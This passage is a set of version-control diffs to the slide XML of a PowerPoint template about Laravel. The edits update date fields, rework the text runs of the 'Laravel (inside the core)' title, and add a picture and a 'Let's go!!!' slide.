+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Let’s go!!!</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1148958190"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
+    <mc:Choice Requires="p14">
+      <p:transition p14:dur="100">
+        <p:cut/>
+      </p:transition>
+    </mc:Choice>
+    <mc:Fallback xmlns="">
+      <p:transition>
+        <p:cut/>
+      </p:transition>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
           <p:cNvPr id="2" name="Title 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
@@ -20317,7 +22698,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -20391,7 +22772,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>24</a:t>
+              <a:t>27</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -20477,7 +22858,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -21079,7 +23460,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -21858,7 +24239,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -22567,7 +24948,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -23268,7 +25649,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -23963,7 +26344,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -24607,7 +26988,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>

--- a/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
+++ b/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
@@ -18602,11 +18602,39 @@
               <a:t>Laravel</a:t>
             </a:r>
             <a:r>
+              <a:rPr lang="en-US" sz="4000" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>nside </a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t> (inside the core)</a:t>
+              <a:t>the core)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>

--- a/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
+++ b/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
@@ -238,7 +238,7 @@
             <a:fld id="{AEC239D8-9946-CA43-8D24-8F75F9EC746F}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>06/05/2015</a:t>
+              <a:t>12/05/2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -406,7 +406,7 @@
             <a:fld id="{30D3C4F2-547F-4EAC-A4FB-1991884D518B}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>06/05/2015</a:t>
+              <a:t>12/05/2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -7627,7 +7627,7 @@
             <a:fld id="{BC3ED275-7153-994E-99D9-5909A673DFFD}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -7822,7 +7822,7 @@
             <a:fld id="{604E6C61-ACAA-C24F-8F8A-3369455B37E6}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -8027,7 +8027,7 @@
             <a:fld id="{6081A34F-7B18-5F4C-91E8-15A0B2DB6558}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -8232,7 +8232,7 @@
             <a:fld id="{C5608FE6-F300-CA4F-8754-F30BE5DB2C02}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -8503,7 +8503,7 @@
             <a:fld id="{35907637-DE80-574B-9387-2B6489C2DDA9}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -8821,7 +8821,7 @@
             <a:fld id="{B29FAD1F-AC8E-0749-90DA-216529CFB27D}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -9273,7 +9273,7 @@
             <a:fld id="{C14BE83E-0675-4D45-9588-77AC2712A327}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -9421,7 +9421,7 @@
             <a:fld id="{2A00E04D-79B7-6D41-BB08-435F493F6C30}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -9541,7 +9541,7 @@
             <a:fld id="{46027C3B-ABCB-0249-A4FA-2A37469F1C4E}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -9843,7 +9843,7 @@
             <a:fld id="{2EF7263A-B695-E045-B371-427CE3BBD559}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -10127,7 +10127,7 @@
             <a:fld id="{E88F21D5-8A27-D144-BD56-2E0DA25B6EEB}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -10393,7 +10393,7 @@
             <a:fld id="{3634E6B9-A6FC-5D46-BEFB-60D025A07933}" type="datetime2">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -11003,7 +11003,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -11211,7 +11211,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -11786,7 +11786,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -12436,7 +12436,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -13062,7 +13062,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -13734,7 +13734,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -14361,7 +14361,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -14988,7 +14988,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -15615,7 +15615,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -16228,7 +16228,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -16869,7 +16869,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -17562,7 +17562,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -18349,7 +18349,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -18606,28 +18606,7 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="4000" smtClean="0">
-                <a:latin typeface="Constantia"/>
-                <a:cs typeface="Constantia"/>
-              </a:rPr>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="4000" smtClean="0">
-                <a:latin typeface="Constantia"/>
-                <a:cs typeface="Constantia"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="4000" smtClean="0">
-                <a:latin typeface="Constantia"/>
-                <a:cs typeface="Constantia"/>
-              </a:rPr>
-              <a:t>nside </a:t>
+              <a:t> (inside </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
@@ -19011,7 +18990,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -19610,7 +19589,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -20462,7 +20441,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -21019,7 +20998,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -21576,7 +21555,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -22133,7 +22112,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -22726,7 +22705,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -22886,7 +22865,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -23412,6 +23391,30 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="2" name="Picture 1"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6750803" y="894108"/>
+            <a:ext cx="2232941" cy="1718078"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -23488,7 +23491,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -24267,7 +24270,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -24976,7 +24979,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -25677,7 +25680,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -26372,7 +26375,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -27016,7 +27019,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, May 06, 2015</a:t>
+              <a:t>Tuesday, May 12, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
